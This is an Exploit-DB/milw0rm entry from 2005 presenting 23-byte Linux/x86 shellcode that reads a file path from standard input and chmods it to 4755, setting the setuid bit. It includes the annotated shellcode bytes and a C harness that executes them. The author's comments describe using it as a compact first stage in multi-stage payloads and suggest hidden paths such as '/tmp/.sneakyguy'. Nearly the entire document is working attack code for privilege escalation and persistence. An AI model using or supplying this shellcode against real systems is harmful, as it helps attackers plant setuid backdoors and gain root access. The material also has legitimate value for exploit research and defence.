Linux/x86 - read(0,buf,2541) + chmod(buf,4755) Shellcode (23 bytes)

EDB-ID:

13406

CVE:

N/A




Platform:

Linux_x86

Date:

2005-11-09


/* readnchmod-core.c by Charles Stevenson <core@bokeoa.com> 
 *
 * Example of strace output if you pass in "/bin/sh\x00"
 * read(0, "/bin/sh\0", 2541)              = 8
 * chmod("/bin/sh", 04755)                 = 0
 *
 * Any file path can be given.  For example: /tmp/.sneakyguy
 * The only caveat is that the string must be NULL terminated.
 * This shouldn't be a problem.  For multi-stage payloads send
 * in this first and then you can send it data with null bytes.
 * I made this for rare cases with tight space contraints and
 * where read() jmp *%esp is not practical.
 *
 */
char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */
"\x31\xdb"//               xor    %ebx,%ebx
"\xf7\xe3"//               mul    %ebx
"\x53"//                   push   %ebx
"\xb6\x09"//               mov    $0x9,%dh
"\xb2\xed"//               mov    $0xed,%dl
"\x89\xe1"//               mov    %esp,%ecx
"\xb0\x03"//               mov    $0x3,%al
"\xcd\x80"//               int    $0x80
"\x89\xd1"//               mov    %edx,%ecx
"\x89\xe3"//               mov    %esp,%ebx
"\xb0\x0f"//               mov    $0xf,%al
"\xcd\x80"//               int    $0x80
;

int main(void)
{
  void (*shell)() = (void *)&hellcode;
  printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by core\n",
         strlen(hellcode));
  shell();
  return 0;
}

// milw0rm.com [2005-11-09]